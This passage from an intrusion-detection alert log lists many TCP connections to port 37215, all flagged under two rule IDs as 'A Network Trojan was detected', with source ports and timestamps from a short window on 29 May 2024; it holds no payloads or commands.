                SID:2829579
                Source Port:59890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631191
                SID:2835222
                Source Port:34986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583560
                SID:2829579
                Source Port:41006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.575909
                SID:2835222
                Source Port:53194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226761
                SID:2829579
                Source Port:56966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374418
                SID:2835222
                Source Port:49804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946223
                SID:2829579
                Source Port:35668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.776794
                SID:2829579
                Source Port:44796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824612
                SID:2829579
                Source Port:50752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.992666
                SID:2835222
                Source Port:36750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155495
                SID:2829579
                Source Port:37454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844641
                SID:2835222
                Source Port:39378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716341
                SID:2829579
                Source Port:53062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.596772
                SID:2835222
                Source Port:54506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166928
                SID:2829579
                Source Port:48360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.556889
                SID:2835222
                Source Port:49622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958389
                SID:2829579
                Source Port:40900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559442
                SID:2835222
                Source Port:57880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764300
                SID:2829579
                Source Port:35010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.174864
                SID:2829579
                Source Port:34652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868438
                SID:2829579
                Source Port:38350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032836
                SID:2829579
                Source Port:46702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.867518
                SID:2829579
                Source Port:51584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.000885
                SID:2829579
                Source Port:40964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008931
                SID:2829579
                Source Port:54908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335481
                SID:2835222
                Source Port:42858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.810821
                SID:2829579
                Source Port:58666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321700
                SID:2835222
                Source Port:34290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.506251
                SID:2835222
                Source Port:48296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262505
                SID:2829579
                Source Port:46382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.472036
                SID:2835222
                Source Port:34198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881299
                SID:2835222
                Source Port:54930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617507
                SID:2835222
                Source Port:36784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782117
                SID:2829579
                Source Port:55000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653964
                SID:2835222
                Source Port:45538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.517954
                SID:2835222
                Source Port:53458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.848705
                SID:2835222
                Source Port:49032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.932614
                SID:2835222
                Source Port:44130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.160141
                SID:2835222
                Source Port:53742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.430765
                SID:2835222
                Source Port:41454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653533
                SID:2829579
                Source Port:48368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.733560
                SID:2835222
                Source Port:44422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113876
                SID:2829579
                Source Port:38354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.547621
                SID:2835222
                Source Port:39246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765715
                SID:2829579
                Source Port:43374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669558
                SID:2835222
                Source Port:39432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.470137
                SID:2829579
                Source Port:55674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.911797
                SID:2835222
                Source Port:45252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981304
                SID:2835222
                Source Port:59266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.532314
                SID:2829579
                Source Port:36970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276025
                SID:2835222
                Source Port:36864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.564876
                SID:2835222
                Source Port:34816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.426969
                SID:2835222
                Source Port:41974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.964167
                SID:2835222
                Source Port:35554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421186
                SID:2829579
                Source Port:36638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763435
                SID:2835222
                Source Port:37174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870372
                SID:2829579
                Source Port:46152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.035601
                SID:2835222
                Source Port:46392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.182666
                SID:2835222
                Source Port:53990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990705
                SID:2829579
                Source Port:38746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207638
                SID:2835222
                Source Port:43306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364009
                SID:2835222
                Source Port:57088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962205
                SID:2835222
                Source Port:36418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.384454
                SID:2835222
                Source Port:60720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689571
                SID:2829579
                Source Port:51362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.711239
                SID:2835222
                Source Port:45696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.268342
                SID:2829579
                Source Port:46990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.872536
                SID:2835222
                Source Port:54310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369395
                SID:2835222
                Source Port:36088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783515
                SID:2829579
                Source Port:32846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728573
                SID:2835222
                Source Port:34548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962971
                SID:2829579
                Source Port:45430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.722186
                SID:2835222
                Source Port:37006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.278161
                SID:2835222
                Source Port:48608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.840390
                SID:2829579
                Source Port:58996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.176961
                SID:2829579
                Source Port:38534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321137
                SID:2829579
                Source Port:41222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165211
                SID:2835222
                Source Port:55970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731790
                SID:2829579
                Source Port:48168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842094
                SID:2835222
                Source Port:55670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844615
                SID:2829579
                Source Port:33852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223432
                SID:2829579
                Source Port:39932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.222487
                SID:2835222
                Source Port:59938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.533168
                SID:2829579
                Source Port:54622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784082
                SID:2829579
                Source Port:53294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.811090
                SID:2835222
                Source Port:41382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584132
                SID:2829579
                Source Port:44760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.701893
                SID:2829579
                Source Port:53654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154892
                SID:2829579
                Source Port:53198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.835963
                SID:2829579
                Source Port:58890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.979840
                SID:2835222
                Source Port:46234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.926909
                SID:2835222
                Source Port:43424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072401
                SID:2835222
                Source Port:59528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381079
                SID:2829579
                Source Port:34494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.959060
                SID:2829579
                Source Port:42330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.431060
                SID:2835222
                Source Port:34360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.189913
                SID:2835222
                Source Port:32948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.077020
                SID:2829579
                Source Port:45336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.522079
                SID:2829579
                Source Port:57750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.984830
                SID:2829579
                Source Port:45234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008690
                SID:2829579
                Source Port:50292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.810925
                SID:2835222
                Source Port:34124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618670
                SID:2829579
                Source Port:42384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.857020
                SID:2835222
                Source Port:59308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903507
                SID:2829579
                Source Port:54664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.593598
                SID:2829579
                Source Port:57638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685657
                SID:2835222
                Source Port:57190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009301
                SID:2829579
                Source Port:60920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630840
                SID:2835222
                Source Port:41794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944577
                SID:2835222
                Source Port:41336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.887732
                SID:2829579
                Source Port:44598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941152
                SID:2835222
                Source Port:55128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555723
                SID:2829579
                Source Port:36956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.847960
                SID:2829579
                Source Port:34406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.517721
                SID:2829579
                Source Port:49122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.447257
                SID:2835222
                Source Port:38562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.874683
                SID:2829579
                Source Port:55440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843978
                SID:2829579
                Source Port:50578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968574
                SID:2829579
                Source Port:44278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.734419
                SID:2835222
                Source Port:58634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.649934
                SID:2835222
                Source Port:43386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915610
                SID:2835222
                Source Port:55852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.572583
                SID:2829579
                Source Port:45560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.784974
                SID:2829579
                Source Port:60118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.897038
                SID:2829579
                Source Port:43292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465943
                SID:2829579
                Source Port:60596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.547567
                SID:2835222
                Source Port:59620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.438631
                SID:2829579
                Source Port:40304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.517395
                SID:2835222
                Source Port:54652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.872791
                SID:2829579
                Source Port:38472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.778395
                SID:2829579
                Source Port:50212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561794
                SID:2829579
                Source Port:41704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113067
                SID:2835222
                Source Port:57650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.788322
                SID:2829579
                Source Port:35750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.968320
                SID:2829579
                Source Port:41158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.856060
                SID:2835222
                Source Port:54332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.081839
                SID:2835222
                Source Port:41060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.699385
                SID:2829579
                Source Port:45304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.240277
                SID:2829579
                Source Port:40406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.628396
                SID:2835222
                Source Port:43944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.872971
                SID:2835222
                Source Port:41976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.810420
                SID:2829579
                Source Port:43070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.788313
                SID:2835222
                Source Port:38590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.517662
                SID:2829579
                Source Port:49324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.848828
                SID:2829579
                Source Port:48408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.809420
                SID:2835222
                Source Port:39988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.519836
                SID:2835222
                Source Port:38690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618622
                SID:2829579
                Source Port:33060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714028
                SID:2829579
                Source Port:41566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.168619
                SID:2829579
                Source Port:49408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.273797
                SID:2835222
                Source Port:40482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652509
                SID:2835222
                Source Port:42648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773198
                SID:2835222
                Source Port:60620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668112
                SID:2829579
                Source Port:58910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.282036
                SID:2829579
                Source Port:38694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.532159
                SID:2829579
                Source Port:37128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684553
                SID:2829579
                Source Port:50652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.105067
                SID:2829579
                Source Port:50358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262449
                SID:2829579
                Source Port:38682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.927754
                SID:2835222
                Source Port:57288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667006
                SID:2835222
                Source Port:48916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896276
                SID:2835222
                Source Port:34728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561769
                SID:2835222
                Source Port:43464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.269533
                SID:2835222
                Source Port:59430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675436
                SID:2829579
                Source Port:58082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.886349
                SID:2835222
                Source Port:41842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560141
                SID:2835222
                Source Port:53016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276180
                SID:2835222
                Source Port:43162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559232
                SID:2835222
                Source Port:40830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.725468
                SID:2829579
                Source Port:37012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.087183
                SID:2835222
                Source Port:41560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928164
                SID:2829579
                Source Port:48816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555706
                SID:2829579
                Source Port:60508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364109
                SID:2835222
                Source Port:55016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687210
                SID:2829579
                Source Port:47072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.215512
                SID:2829579
                Source Port:43006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.982176
                SID:2829579
                Source Port:41122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.825914
                SID:2835222
                Source Port:60050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618563
                SID:2829579
                Source Port:52294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.741727
                SID:2829579
                Source Port:35810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.037077
                SID:2829579
                Source Port:33142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915732
                SID:2835222
                Source Port:46512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873603
                SID:2835222
                Source Port:56594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336055
                SID:2835222
                Source Port:44866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.871875
                SID:2835222
                Source Port:35092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008519
                SID:2835222
                Source Port:53574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914701
                SID:2829579
                Source Port:32900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369930
                SID:2829579
                Source Port:57710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.420292
                SID:2835222
                Source Port:34970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.531251
                SID:2835222
                Source Port:39434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362864
                SID:2835222
                Source Port:58896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.950319
                SID:2835222
                Source Port:34716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.470245
                SID:2835222
                Source Port:42744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.358675
                SID:2835222
                Source Port:35184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369241
                SID:2835222
                Source Port:52848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.788298
                SID:2829579
                Source Port:48128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.332748
                SID:2835222
                Source Port:49034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.317946
                SID:2835222
                Source Port:42836
                Destination Port:37215
